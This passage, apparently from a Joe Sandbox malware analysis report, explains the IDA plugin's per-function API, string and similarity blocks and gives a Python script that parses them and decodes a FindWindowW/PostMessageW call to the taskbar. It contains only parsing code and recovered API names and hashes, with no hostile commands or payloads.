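The blocks above are the Joe Sandbox IDA plugin's per-function summaries: the APIs a function calls directly (with the arguments the plugin recovered and the call-site address), calls made inside the sub-functions it invokes, referenced strings with their xrefs, and the Similarity identifiers (API ID, String ID, fuzzy hashes) used to match functions across samples. The following is an added example, not part of this report or of Joe Sandbox, that parses this text into records so blocks can be queried, for instance for the FindWindowW(Shell_TrayWnd) / PostMessageW pair. The two sample blocks are copied from the listing above with the repeated "Associated" lines trimmed; the names ApiCall, FunctionBlock, parse_blocks, direct_api_names, blocks_calling and posted_messages are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin function blocks (APIs / Strings / Similarity) into records."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two blocks copied from this report with the page's bullets and
# indentation; the repeated "Associated" dump lines are left out for brevity.
SAMPLE = """
APIs
  • Part of subcall function 0083B314: _memset.LIBCMT ref: 0083B321
• IsDebuggerPresent.KERNEL32(?,?,?,0080100A), ref: 0083B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0080100A), ref: 0083B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0083B2FE
Memory Dump Source
• Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• Instruction Fuzzy Hash: 53E06DB02007218BE760EF6CE8047427AE4FF40304F00892CE656C7742EBB4E488CBA1
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0088596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00885981
  • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• Instruction Fuzzy Hash: 06D0C931384311B6E6A4BB74DC1BFD76A14FB10B50F010825B359EA2D1D9E4A800CB54
"""

SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
ID_KEYS = ("API ID", "String ID", "API String ID", "Opcode ID", "Instruction ID",
           "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
# optional "Part of subcall function X: " prefix, Name.MODULE, optional (args), "ref: addr"
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<name>[A-Za-z_]\w*)\."
                    r"(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")
KEY_RE = re.compile(r"^(?P<key>%s): (?P<value>.*)$" % "|".join(map(re.escape, ID_KEYS)))

@dataclass
class ApiCall:
    name: str                      # e.g. "PostMessageW"
    module: str                    # e.g. "USER32"
    args: list[str]                # argument tokens as printed; "?" = not recovered
    ref: str                       # call-site address
    subcall: Optional[str] = None  # address of the called function when the line is a subcall

@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, list[str]]] = field(default_factory=list)  # (text, xref addresses)
    ids: dict[str, str] = field(default_factory=dict)                   # the Similarity key/values

def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":                       # every block opens with its APIs list
            if cur is not None:
                blocks.append(cur)
            cur, section = FunctionBlock(), "APIs"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if cur is None:                          # fragment cut off before its APIs header
            cur = FunctionBlock()
        if m := KEY_RE.match(line):
            cur.ids[m["key"]] = m["value"]
        elif section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m["text"], m["xrefs"].split(", ")))
    if cur is not None:
        blocks.append(cur)
    return blocks

def direct_api_names(block: FunctionBlock) -> set[str]:
    return {c.name for c in block.apis if c.subcall is None}  # subcall lines belong to callees

def blocks_calling(blocks: list[FunctionBlock], *names: str) -> list[FunctionBlock]:
    return [b for b in blocks if set(names) <= direct_api_names(b)]

def posted_messages(block: FunctionBlock) -> list[tuple[int, int, int]]:
    """(msg, wParam, lParam) of each Post/SendMessage call whose arguments were recovered."""
    out = []
    for c in block.apis:
        if c.name.startswith(("PostMessage", "SendMessage")) and len(c.args) >= 4:
            try:
                out.append(tuple(int(a, 16) for a in c.args[1:4]))
            except ValueError:                   # "?" placeholder: argument not recovered
                pass
    return out

if __name__ == "__main__":
    for b in blocks_calling(parse_blocks(SAMPLE), "FindWindowW", "PostMessageW"):
        print(b.ids["Instruction Fuzzy Hash"], sorted(direct_api_names(b)), posted_messages(b))
```

Run as a script, it prints the Shell_TrayWnd block's fuzzy hash, its direct API set and the decoded PostMessageW arguments: message 0x0111 is WM_COMMAND, posted with wParam 0x197 (407) to the taskbar window located by FindWindowW. Two caveats when triaging from these blocks: arguments the plugin prints as "?" were not recovered and are skipped by posted_messages(), and the IsDebuggerPresent/OutputDebugStringW block carries the "ERROR : Unable to initialize critical section in CAtlBaseModule" string from ATL's CAtlBaseModule constructor, so that debugger check is library startup code linked into the binary rather than something specific to this sample; direct_api_names() is what lets you tell a function's own calls apart from those of its callees.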